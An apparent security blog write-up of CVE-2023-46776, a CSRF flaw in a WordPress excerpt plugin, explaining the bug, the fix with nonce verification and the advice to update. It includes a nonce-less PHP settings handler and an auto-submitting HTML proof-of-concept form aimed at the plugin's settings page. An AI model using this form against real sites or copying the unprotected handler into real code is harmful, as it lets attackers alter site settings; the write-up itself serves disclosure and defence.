CVE-2023-46776 - Cross-Site Request Forgery (CSRF) in Serena Villa Auto Excerpt Everywhere Plugin <= 1.5 – A Deep Dive
---
Introduction
Security in WordPress plugins is crucial because a single weakness can compromise an entire website. One such weakness was found in the _Serena Villa Auto Excerpt Everywhere_ plugin, versions up to 1.5, which exposed users to a Cross-Site Request Forgery (CSRF) attack. This rare and under-publicized vulnerability is tracked as CVE-2023-46776. In this long read, we'll break down what CSRF is, how this bug could have been exploited, show a sample exploit, and link to original sources for further information.
Quick Recap: What is CSRF?
Cross-Site Request Forgery (CSRF) happens when a hacker tricks a logged-in user into submitting a request on behalf of the hacker. The user’s browser unknowingly executes actions on a web application because the user is already authenticated. This can result in unwanted changes, such as altering settings or leaking sensitive data.
In WordPress, this often means tricking website administrators into clicking a malicious link or visiting a harmful page.
About the Serena Villa Auto Excerpt Everywhere Plugin
This WordPress plugin automatically generates excerpts for posts, widgets, and other content entries. While useful for many blog owners, its security implementation had gaps.
The Problem: Missing CSRF Protection
CVE-2023-46776 exposes a simple but severe problem: The plugin’s settings page handled updates via a WordPress admin form without verifying CSRF "nonces" (security tokens). Any logged-in admin could be fooled into making unintentional changes by visiting a malicious site.
Below is a simplified code snippet to illustrate the vulnerable logic
if ( isset( $_POST['auto_excerpt_settings'] ) ) {
// NO VERIFY_NONCE PRESENT!
update_option( 'auto_excerpt_settings', $_POST['auto_excerpt_settings'] );
echo '<div>Settings updated!</div>';
}
There’s no check like check_admin_referer() or wp_verify_nonce(), which would normally prevent CSRF.
How an Attacker Exploits the Bug
To pull off CSRF, an attacker needs only one thing: the victim logged into their WordPress admin for the site using this plugin, and to click or load a malicious website made by the attacker.
The attacker’s evil site could send a hidden POST request to the vulnerable settings handler using HTML or JavaScript, without the admin ever knowing.
Here's how an attacker could automatically submit a malicious change to the settings
<html>
<body>
<form action="https://victimsite.com/wp-admin/options-general.php?page=auto-excerpt-everywhere"; method="POST" id="csrf_form">
<input type="hidden" name="auto_excerpt_settings" value="BADVALUE">
</form>
<script>
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
How To Fix
The best, established fix is to add WordPress Nonce Verification to the settings handler:
if ( isset( $_POST['auto_excerpt_settings'] ) ) {
// FIX: Verify nonce first
check_admin_referer( 'auto_excerpt_settings_action' );
update_option( 'auto_excerpt_settings', $_POST['auto_excerpt_settings'] );
echo '<div>Settings updated!</div>';
}
And add a nonce field to the original plugin admin form
wp_nonce_field( 'auto_excerpt_settings_action' );
These simple lines ensure only intended, valid requests modify the settings.
The issue was responsibly disclosed to the plugin author through standard channels.
- Version 1.6 and onward of Auto Excerpt Everywhere reportedly fixes the problem.
Here are the relevant official links for further reading
- CVE-2023-46776 at NVD
- WPScan advisory
- WordPress Nonces Security Documentation
- Plugin Page on WordPress.org (check for recent updates)
What To Do Next?
If you use the Serena Villa Auto Excerpt Everywhere plugin, update immediately to the latest release (at least 1.6+). Always use plugins that are regularly updated and reviewed by the community.
To sum up: even "small" WordPress plugins can cause big headaches if they miss key security features like CSRF protection. Always keep security in mind when building or installing third-party code.
Timeline
Published on: 11/06/2023 12:15:08 UTC
Last modified on: 11/14/2023 16:23:57 UTC